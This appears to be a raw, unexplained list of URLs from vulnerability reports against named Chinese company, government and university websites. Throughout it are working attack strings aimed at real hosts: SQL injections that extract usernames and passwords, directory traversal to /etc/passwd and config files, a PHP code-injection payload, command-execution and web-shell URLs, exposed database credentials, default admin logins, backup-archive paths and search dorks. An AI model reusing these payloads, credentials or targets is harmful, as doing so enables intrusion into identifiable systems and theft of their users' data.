http://**.**.**/bocadmin/j/uploadify.php_杭州中泰深冷技术股份有限公司_ http://**.**.**/bocadmin/j/uploadify.php_范·优奇家具有限公司_ http://**.**.**/en/bocadmin/j/uploadify.php__传化公路港物流有限公司_ http://**.**.**/bocadmin/j/uploadify.php___杭州朗杰测控技术开发有限公司_ http://**.**.**/bocadmin/j/uploadify.php__浙江伟星管理咨询有限公司_ http://**.**.**/chn/bocadmin/j/uploadify.php__宁波嘉德户外用品有限公司_ http://**.**.**//bocadmin/j/uploadify.php___杭州艺之展展示设计有限公司_ http://**.**.**/sj//bocadmin/j/uploadify.php__通和置业有限公司_ http://**.**.**//bocadmin/j/uploadify.php__杭州蓝拾信息技术服务有限公司_ http://**.**.**/bocadmin/j/uploadify.php__东泷重型机械有限公司_ http://**.**.**//bocadmin/j/uploadify.php_ http://**.**.**/bocadmin/j/uploadify.php__万象城官网_ http://**.**.**//bocadmin/j/uploadify.php__众联文化事业机构_ http://**.**.**/en//bocadmin/j/uploadify.php__N8club_ http://**.**.**/bocadmin/j/uploadify.php___凌尚网络公司_ http://**.**.**/bocadmin/j/uploadify.php___赛宁 http://tw.codoon.com/backend/blacklist http://tw.codoon.com/backend/gorup http://tw.codoon.com/backend/friendsrc http://my.yaolan.com/cajax/AddFollow/userId/55201234/followId/55438331.html?d=1436184026450 http://120.195.108.123:8080/ucenter/ http://fed.lvmama.com/ http://fed.lvmama.com:80/ http://a.g.gomesell.com/login/login.action http://**.**.**/admin.phpc=db&m=sql_ http://**.**.**/phpmyadmin/ http://**.**.**/phpmyadmin/ http://**.**.**//member/index.php0.878158365841955&c=api&height[]=32&m=captcha&width=90 http://114.255.159.82/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://html5.cpd.com.cn/yunxiu0506.sql http://order.eben.cn/ http://www.fang360.com http://test.fang360.com http://test.fang360.com/index.php?app=user&ac=set&ts=face http://test.fang360.com http://124.172.250.167/ url:http://114.251.229.203:8080/mcl/ url:http://222.29.216.247/ url:http://222.29.216.247/ http://research.sfn.cn/BackStage/UserLogin/Login.aspx http://promotion.mcdonalds.com.cn/mcardadmin/editcard?id=pVI6xjpLICsKthTgmRT1WCtcTu8s http://cr23g.crcc.cn/ztlm.asp?id=647 http://cr23g.crcc.cn/jtry_dc.asp?id=495 http://cr23g.crcc.cn/qygl_dc.asp?id=8911 http://cr23g.crcc.cn/jtdt_dc.asp?id=8931 http://cr23g.crcc.cn/kjjb_dc.asp?id=8053 http://www.zdyfyyjs.com/xkjs/show.asp?bh=363 http://gd.189.cn/gz/xy/ http://cr14g.crcc.cn/NwSendInf.do?MAINID=7e6fd21fbf654897bb23251776c3abbc&MAINCOUNT=3&SUBCOUNT=0&opType=moreList&T_NW_DOCUMENT/IDBIZ=99999999 http://cr5sdi.crcc.cn/inc/qiye_wenhua.asp http://group.rbc.cn/ http://group.rbc.cn/ https://code.jquery.com/jquery-1.9.1.min.js http://www.ybyinhang.com/ inurl:konka.com/OaFiles.do?username= http://qdgl.konka.com/OaFiles.do?username=毛洪军&userpass=0 http://www.benlai.com/giftcard inurl:hebnetu.edu.cn/?UserName= http://www.hebnetu.edu.cn/?UserName=bywdd&Password=waxbfbyw&btnLogin=%B5%C7+%C2%BC http://oa.joyu.com/ http://www.isd.pku.edu.cn http://123.127.101.108/users/sign_in,该服务器存在未授权访问,可绕过认证,直接查看并浏览开发人员上传的源代码。 http://jiehun.55bbs.com/index.php?c=MyHunJia_RegAddr&a=GetReg&c_id=4007&p_id=1012 https://www.zj11831211.cn/login.jsp浙江电信家门口充值系统 http://218.26.187.194/)存在struts2远程命令执行漏洞泄露敏感数据。 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000150694113 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000171901331 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000253165011 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000090365632 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000124937515 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000176011525 http://180.153.139.84:11381/ydccp/login.jsp http://wsesj.eben.cn/index.php?r=works/view&id=82 http://www.8858.gov.cn/view/service?keys=aaa http://www.cr15g.com:8082/login.jsp http://jgcx.qingdao.gov.cn http://intx5.crcc.cn:8080/x5/portal/login.w http://120.195.108.123:8080/ucenter/index/indexAction!welcome.action?curUser=test http://120.195.108.123:8080/ucenter/index/indexAction!welcome.action?curUser=admin FTP:180.96.19.198 http://**.**.**.**/bugs/wooyun-2015-091128 http://**.**.**.**/ http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=6 http://**.**.**.** http://**.**.**.**/Web/Qikan.aspx http://**.**.**.**/CommonPage.aspx?Id=6 http://**.**.**.**/web/CommonPage.aspx?Id=36 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/Qikan.aspx http://oa.leyou.com/main/login.jsp http://www.beihaipark.com.cn/admin/Login.aspx http://www.beihaipark.com.cn/news.aspx?nid=f3xzXdR2 http://www.sjb-ys.com/admin http://www.sjb-ys.com/roaddetail.php?id=13 http://www.gotohz.com/hzlywywb.rar http://www.wanbu.com.cn/NewWanbu/App/Api/index.php/Blog/getBlog/userid/[id]/page/0/ www.wanbu.com.cn:8888 http://220.196.57.147:8080/GetUser.aspx?password=123456&service=api_company_login&username=admin http://220.196.57.147:8080/GetUnit.aspx?BeginDate=2015-06-20&City=3100&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist http://220.196.57.147:8080/GetResv.aspx?endDate=2015-06-07&guestId=8229518&isDelete=0&pageIndex=1&pageSize=20&searchType=&service=get_resvlist_info&sort=0&startDate=2014-01-01 http://220.196.57.147:8080/GetUnit.aspx?RmtpId=1&service=api_getUnitRmtp&UnitId=0001 http://dezhou.dzwww.com/dzzt/wish/data/db.inc.php http://www.hxgsbank.com/search.php?seaTitle=站内搜索...&seaform.x=0&seaform.y=0存在SQL注入漏洞 Google:inurl:search/doSearch.html http://jr.house365.com/?s=/abc/abc/abc/${@print%28@assert%28$_POST[%27a%27]%29%29}# http://tms.telehouse.net.cn/tmis/login.php http://www.qinqin.net/index.php?act=login&op=forget_password http://m.t.17186.cn/login.action http://m.t.17186.cn/exp.jsp http://www.apac.org.cn/ http://www.apac.org.cn/jbpt/ http://igr1.cnnic.cn/igr/center.do?path=jubao http://hbfy.chinacourt.org/public/detail.php?id=281 http://www.joyu.com/page1.asp?num=1= http://www.joyulf.com/index.asp http://www.joyulf.com/player/index.asp www.joyulf.com http://testblog.3g.cnfol.com:8000 http://118.195.133.196:9990/sdb2b/login.action存在命令执行漏洞 http://118.195.133.196:9990/sdb2b/1.jsp密码123 https://www.ddsoucai.com/ http://jn.hpour.com/sys/SysUser_Logon.aspx http://ydzs.shnu.edu.cn/index.php?m=Index&a=classes&type=1 http://ydzs.shnu.edu.cn/data/ http://te.shnu.edu.cn:86/Webform/BaseInfo/PublicInformation/NewsList.aspx?ID=2 http://oa.tianjimedia.com/ http://oa.tianjimedia.com/yyoa/common/js/menu/test.jsp?doType=101&S1= http://**.**.**/security/login.action http://106.2.168.35//qwe.jsp jdbc:sqlserver://10.0.11.3:1433;databaseName=gmxh;user=gmxherpuser;password=gmxherpDbAdmin inurl:searchOrder?email=&receiverName=&orderNumber= https://www.microsoftstore.com.cn/guest/order/1399351498 https://www.microsoftstore.com.cn/guest/order/1399293832 https://www.microsoftstore.com.cn/guest/order/1398906942 https://124.160.61.218/por/login_psw.csp?rnd=0.15976454272302432 https://221.226.184.164/por/service.csp?rnd=nokmoeicpdochimh yyxy.txon.net/exam http://yyxy.txon.net/exam_sh/login.action?userId=13900990099 https://202.136.215.38:4430/por/login_psw.csp https://202.136.215.38:4430/web/1/http/0/172.16.1.4/OA/?SVPNSSOLogin&1436253822&20262&4287041572& https://202.136.215.38:4430/web/1/http/2/172.16.1.4/OA/UploadFile/通讯录.xls https://202.136.215.38:4430/web/1/http/0/172.16.1.6/cms/ http://218.203.206.133:8000/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/hosts http://mail.scti.cn/pma/ http://www.moko.cc/zmAction%7Cforward.action?actionkey=wanmeiNew_20141213%27+and+%27f%27%3D%27f http://szxsc.shop.6v68.com http://www.now.cn/email/overview.net http://sop.secoo.com/cooperator/loginAction.action http://wx.aeonlife.com.cn/baodan/user/check.do?openId= http://wx.aeonlife.com.cn/baodan/user/check.do http://218.75.137.70:8250/WWCPS/login.action存在命令执行漏洞 http://mail.louxia100.com/ http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://wsbs.gzmz.gov.cn/gsmpro/web/wbdt/bszn.jsp?service_id=2666 http://ti.louxia100.com/ http://weixin.lenovo.com.cn/thinkpad/login.php http://ad.hz.letv.com/phpapi/tp/tp_tab_add.php?callback=?&tpid=1 http://lm.meilishuo.com/union/sppromotion/?sort=0&type=1&content=尚雅衣橱 http://lm.meilishuo.com/union/stpromotion/?sort=0&catalog=1 http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=11801&type=1&content=圆领长袖修身男女士居家服 http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=11801&type=1&content= http://www.now.cn/whois/info.net http://mall.cmbc.com.cn/passport/password.jhtml http://api.meituan.com/combo/v2/combo.json…… http://api.waimai.meituan.com/api/v6/app/innercheckupdate…… http://www.meituan.com/api/v2/appstatus…… http://bbs.digione.cn:7080/ http://121.14.118.250:7080/uc_server/data/tmp/x.php http://121.14.118.250:8088/weaver/weaver.email.FileDownloadLocation?download=1&fileid=2 https://101.251.207.8/fck/ https://101.251.207.11/FCKeditor/ https://101.251.207.10/FCKeditor/ https://101.251.207.10/upload/ http://zentao.coocaa.com/ http://122.193.9.45 http://122.193.9.45/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x3a,password%29%20from%20cdb_members%20limit%206,1%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://115.182.42.140/zabbix/ http://m.qu.cn/forum.php http://**.**.**.**/bugs/wooyun-2010-0103611 http://www.zfxindai.cn/event/index/id/1.html http://www.jollymm.com/members/address http://ask.youtx.com/Ajax/AjaxGetDestinationByWord.aspx?attraction=%E5%A4%A9%E5%9D%9B%E5%85%AC%E5%9B%AD ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1 http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName= http://weixin.jxlife.com.cn/jxlife/jsp/getPhoneCode http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName= http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro_id=5 current_user:55babay@10.15.18% http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro_id= http://files.leiphone.com/ http://files.leiphone.com/protected/config/main-test.php mysql:host=113.106.92.93;dbname=wankr100 http://www.letvcloud.com/user/checkparam http://58.247.113.202:90/manager/html http://linker.tw/url.php?uct=0-0-12-5-0*31 http://http.hz.qingting.fm/admin/ https://mail.yundasys.com/owa/# http://**.**.**.**/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**:8028/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**/user/login.aspx default:a进去后 http://www.dhgps.cc/ http://www.gxjldkj.com:8089/ http://www.txgps.com:8099/ http://www.yncwzn.com:7777/ http://py.gps009.net:81/ http://88056.com.cn:8087/ http://www.bds178.net/ http://61.156.14.155:8086/Gpswebtestpage.aspx http://zc.gps009.net:8086/ http://q.gps009.net/ http://cc.xjfhtgps.com/ http://gps.txsci.com:8086/ http://www.swzcn.com:6606/ http://www.88056.com.cn:8087/ http://122.193.9.222:8080/ http://**.**.**/ http://www.cctvfinance.com/plus/hangqing.php?c=showsmall2&code=szse399006 http://221.122.70.172/index.action http://221.122.70.172/exp.jsp http://www.cctvfinance.com/plus/getjson.php?c=codesearch&search_name= http://kids.chineseall.cn/index.php/index/channel/sort/-1 http://zxys.yantai.gov.cn/offer/jsp/login.jsp http://szfoa.yantai.gov.cn/地址,存在admin https://github.com/sniciq/generate/blob/55d1f3e6181135b19eb3b2285add3d4dd13cb057/src/main/resources/spring/applicationContextMail.xml http://www.ntwj.gov.cn/news.asp?Action=Details&classid=&ID=11037%27 http://www.ntwj.gov.cn/zdgf.asp?Action=Details&classid=&ID=10546%27 http://www.ntwj.gov.cn/admin/login.asp?Action=LoginCheck co-biz.variflight.com/product/ http://wap.l0086xdk.com/ http://wap.l0086xdk.com/admin/chkadmin.asp www.bornedu.com/bornmanage/index.php?s=/Zhibo/index/tag/1 http://app1.unicomlabs.com/Login.action http://app1.unicomlabs.com/Login.action https://mail.yundasys.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.yundasys.com%2fowa%2f http://www.ssfy.gov.cn/infoshow.php?id=1073 http://www.3658mall.com/member-get_password_mobile.html http://www.joyu.com/player/index.asp www.joyu.com http://www.toprand.net http://www.chouchoubaby.com/sysadmin/console/Index.aspx http://telca.com.cn/sysadmin/Login.aspx http://www.topzs.hk/sysadmin/Login.aspx http://www.shenglu.com/sysadmin/Login.aspx http://lac.jnu.edu.cn/webmanage/Login.aspx http://www.chouchoubaby.com/sysadmin/Login.aspx http://hl.cohl.com/sysadmin/Login.aspx http://www.etrlawfirm.cn/sysadmin/Login.aspx http://www.atoptechnology.com/sysadmin/Login.aspx http://sinopharm-gz.com/SysAdmin/Login.aspx http://dcyssj.com/sysadmin/Login.aspx http://paxtechnology.us/sysadmin/Login.aspx http://langrungroup.com/sysadmin/Login.aspx http://www.etrlawfirm.cn/sysadmin/Login.aspx http://100tal.com http://www.izhikang.com http://dbaoming.izhikang.com/ http://220.181.163.222:8000/admin/webroot/index.php https://itebeta.baidu.com/;说明他也许是一个内部服务吧, http://220.181.163.222:8000/admin/webroot/index.php http://tc.homelink.com.cn/ http://jwbinfosys.zju.edu.cn/lw_xsxt.aspx http://221.2.149.28:8090/qlqd/PowerList/Power_index.aspx http://221.2.149.28:8090/qlqd/PowerList/Power_index.aspx?itemtype=&itemname=aaa%27 http://**.**.**.**/admin/Product/ProductList.aspx http://**.**.**.**/admin/Product/ProductList.aspx http://www.fxiaoke.com/H/DF/Get/201507_07_b0700201-8e9a-4e3c-b383-f1ded5817f5b.html http://www.fxiaoke.com/H/df/get?id=201507_08_06080db9-f871-4497-9fc2-58646e382151.xml http://zone.wooyun.org/content/17801 http://www.qzrs.gov.cn/Login/Login http://bslog.biostime.com.cn/dealerPlatform/permission/dealerLogout.do http://track.bondex.com.cn/login.aspx?Token=$Token$ http://**.**.**.**/opensoft.asp?id=99&url=1 http://**.**.**.**/opensoft.asp?id=110&url=1 http://**.**.**.**/opensoft.asp?id=&url=1 http://**.**.**.**/opensoft.asp?id=25&url=1 http://**.**.**.**/opensoft.asp?id=16&url=1 http://**.**.**.**/opensoft.asp?id=27&url=1 http://**.**.**.**/jjpc/opensoft.asp?id=12&url=1 http://**.**.**.**/opensoft.asp?id=27&url=1 http://**.**.**.**/opensoft.asp?id=3&url=1 http://**.**.**.**/opensoft.asp?id=27&url=1 http://**.**.**.**/opensoft.asp?id=39&url=1 http://**.**.**.**/opensoft.asp?id=63&url=1 http://**.**.**.**/opensoft.asp?id=24&url=1 http://**.**.**.**/opensoft.asp?id=5&url=1 http://**.**.**.**/opensoft.asp?id=83&url=1 http://**.**.**.**/opensoft.asp?id=8&url=1 http://**.**.**.**/opensoft.asp?id=37&url=1 http://**.**.**.**/opensoft.asp?id=29&url=1 http://**.**.**.**/opensoft.asp?id=107&url=1 http://**.**.**.**/rzgs/opensoft.asp?id=&url=1 http://**.**.**.**/opensoft.asp?id=16&url=1 http://**.**.**.**/opensoft.asp?id=56&url=1 http://**.**.**.**/opensoft.asp?id=80&url=1 http://**.**.**.**/opensoft.asp?id=19&url=1 http://**.**.**.**/opensoft.asp?id=&url=1 http://**.**.**.**/opensoft.asp?id=41&url=1 http://**.**.**.**/opensoft.asp?id=16&url=1 http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://**.**.**.**/extra/gzcy/retell.jsp?id=30&subjectid=null http://www.oppo.com/cn/ URL:http://ams.yundasys.com:11366/hkgl/login.jsp http://42.159.28.165/ http://42.159.28.165/phpmyadmin/ http://ppbt.changba.com/ http://ppbt.changba.com/0xx.php http://m.yuntonghua.net//NewInface/Zb/VerifyCode.asp?platform=IPHONE&mobile=13966991737&ver=IphoneV6.5.9&code=1111&pwd=2a96f99b753e1d103d3c44383fffdd6e http://mail.marinacity.cn http://hongyan.cqupt.edu.cn/szzc/maozedong/text.php?t=2&i=188 http://hongyan.cqupt.edu.cn/welcome/2014/admin http://golf.ifeng.com/ http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://**.**.**.**/module/upPhoto/wpicMore.action?websiteid=1037&pagenum=1 http://shop.sennheiser.com.cn/Sale/OrderOK.aspx?SOSysNo=87419 http://mail.qdgxjt.com/webmail/login9.php http://interface.dalingjie.com/ http://vr0.6.cn/../../../../../../../../../etc/passwd http://r.6.cn/../../../../../../../../../etc/passwd ftpuser:x:504:505::/mnt/r:/usr/local/scponly/sbin/scponlyc http://v.6.cn/logins.php?next_action=-- url:http://61.153.204.40:8080/manager/html user:admin https://p2p.edai.com/?code&p=add&q=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://amall.chinac.com/amall_backend_web/admin_toLogin.action user:admin pass:admin http://sxxy.zjer.cn/info_column.php?id=10&f=%BB%F1%BD%B1%C3%FB%B5%A5 http://yun.zjer.cn/index.php?r=studio/comment/commentlist&sid=269&id=120370&page=&tp=1* url:http://119.1.100.7:8080/manager/html user:admin http://jxgl.jiajiaoban.com/admin http://www.izuche.com/ http://www.gkong.com/webcast/SearchWebcast.aspx?key=88952634 http://www.gkong.com/products/pro_del.asp?id= http://yimin.edai.com/intro.php?id=【注入点】 lear:both http://219.232.200.34/pxwebapp/login.jsp http://219.232.200.34/is2/zecmd.jsp http://219.232.200.34/chopper/chopper.jsp http://survey.news.sina.com.cn/list_search.php?channel_id=1&order=hot&page=2 http://newsport.gewara.com/ http://www.longfeng.com/findpw.html http://tc.homelink.com.cn/Superagent/Superagent00.aspx http://sjupdate.sj.91.com的数据包 http://bcs.91.com/rbreszy/iphone/soft/2015/7/8/a6b9762e03134db881733ea338430ccd/com.youku.YouKu_4.6_20150706_635719609477538660.ipa","size":"","versionName":"5.0.5","versionCode":"","iconUrl":"","updateContent":"1 http://sjupdate.sj.91.com的数据包进行修改,改后的值为 http://sjupdate.sj.91.com/user.ashx?chl=jZg3GleBqu%2Fa2oWvpfPBLecjfojj9X%2BH&nt=10&versionName=5.0.5&osv=7.0.4&versionType=ipa&imei=6d8790a886e6a1edd8699f125c4954f86b39e4c5&dm=iPhone4,1&sv=5.0.5&act=5&productId=2&cuid=15c7c7af83f37a6d38a8d6169b23130716b3035d&pid=2&mt=1 http://bcs.91.com/rbreszy/iphone/soft/2015/7/8/a6b9762e03134db881733ea338430ccd/com.youku.YouKu_4.6_20150706_635719609477538660.ipa","size":"","versionName":"5.0.5","versionCode":"","iconUrl":"","updateContent":"1 https://www.exploit-db.com/exploits/37423/ http://plant.life.tsinghua.edu.cn/ http://www.honhaicargo.com.tw/pages/honhai/news_main.aspx?ID=1257&tv=0101 http://c.rednet.cn/bm/app/appfunction.asp?app_txt=app_info http://zzb.sdau.edu.cn/wsdx/ http://www.jswst.gov.cn/gb/jsswst/sphywszb/index.html http://58.213.112.250:65493/genmedia http://58.213.112.250:65493/genmedia/frmSearchResult.aspx?searchkey= ip:121.10.245.222 http://219.142.62.196:8080/rone/SignOnServlet http://219.142.62.196:8080/is/cmd.jsp http://hd.rising.com.cn/BussinesStation/info.aspx?id=16 http://122.193.9.82/ http://job.wjrcb.com/showImg.do?filename=/etc/hosts http://job.wjrcb.com/showImg.do?filename=/home/zxzp/.profile http://61.178.183.225:8000/general/index.aspx http://xxx/xxx.html http:/xxx.com/1.php http://my.letv.com/crossdomain.xml http://**.**.**.**/list.php?cid=1 http://www.nesc.cn/db.zip http://210.22.8.98/login.action https://mail.youku.com http://1.xingruan.zto.cn或http://gps.zto.cn,中通全国车辆GPS管理平台,存在弱口令,登陆进去能够对中通所有车辆进行实时监控,查看历史轨迹、运输业务、车务管理、基础信息(包含全部司机的联系方式)和报表中心等敏感信息。 http://**.**.**/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**//_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://**.**.**/xsweb//_data/index_LOGIN.aspx_ http://2015.cert.org.cn/ http://www.zgfcc.com/zhonggang/DengLu.aspx http://www.zgfcc.com/system/Login.aspx http://www.fxiaoke.com//H/DF/Get/201507_08_cabd0647-cc5a-48ee-9893-0077d5962262.html http://www.367edu.com/?a=web.index&uid=8890 http://continental.hiall.com.cn/c.php http://www1.scuec.edu.cn/stu/xyh2010/view.php?id=71 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9%27%20and%20%271%27%20=%20%271 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9%27%20and%20%271%27%20=%20%272 http://www.gqsj.cc/www/news/list.php?cid=8&cidz=9 http://o2o.189.cn:9080/prize/prizeCenter.action http://123.125.207.148 http://123.125.207.148/invoker/JMXInvokerServlet http://123.125.207.148/is/cmd.jsp?pwd=023&cmd=ipconfig http://122.225.117.132:9014/QFKD-NETWORK-QUERY/management/netWorkQuery/getNetworkByPagination?netWorkNum=336&pageNumber=2 http://mail.cnplhd.com.cn/ http://219.141.231.197:8080/suzhou/ http://219.141.231.197:8080/AllFactory/ http://219.141.231.197:8080/AbroadFactory/ http://career-whrc.huawei.com/pages/activity_details.php?activity_id=70 http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20UNION%20SELECT%201,2,3,4,5,group_concat%28username,0x7c,password,0x7c,email%29,7,8,9,10,11,12%20from%20ucenter.uc_members%20where%20uid=1%23 http://www.51testing.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20UNION%20SELECT%201,2,3,4,5,group_concat%28username,0x7c,password,0x7c,email%29,7,8,9,10,11,12%20from%20ucenter.uc_members%23 http://blog.ce.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments http://info.17ugo.com/page.php?act=upviews&id=3315%27 http://www.sunlands.com/category/ajaxWebCategory.htm http://pass.hujiang.com/forgot_password/### http://pass.hujiang.com/forgot_password/step2/#### http://www.onekj.cn/wwwroot.zip http://physics.whu.edu.cn/cxpan/guestbook/index.asp http://yun.zjer.cn/index.php?id=*&r=studio/class/info&sid=163 http://oa.glsc.com.cn:10040/wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9QJ_89PTUFP_SEv2CdEVFALCPJr8!/ http://jyzx.sjys.cn/shjyzx/newsShow.do?id=e063f9b4-e4c3-420c-bb20-3418b291e181 http://www.bestsonny.com/ http://www.bestsonny.com/data/1.php http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1%27 http://42.62.39.206/wap/ph2?mo=&cm=M3140060&site=0&psortid=1 http://218.5.72.107:8080/* ip:59.151.119.11 http://www.lnredcross.org.cn/web/announce.asp?id=168 http://www.hdxjj.gov.cn/hdxjj.zip Google:inurl:search/doSearch.html http://passport.zcool.com.cn/verifyEmail.do?name=86657550@qq.com&appId=1006 http://passport.zcool.com.cn/verifyEmail.do?name=86657550@qq.com&appId=1006 http://gz.kmwsrc.com.cn/Login.aspx http://wb.kmwsrc.com.cn/Exam/AdminLogin.aspx http://2015.kmwsrc.com.cn/Exam/AdminLogin.aspx http://qingdapost.com/qingdapost.rar 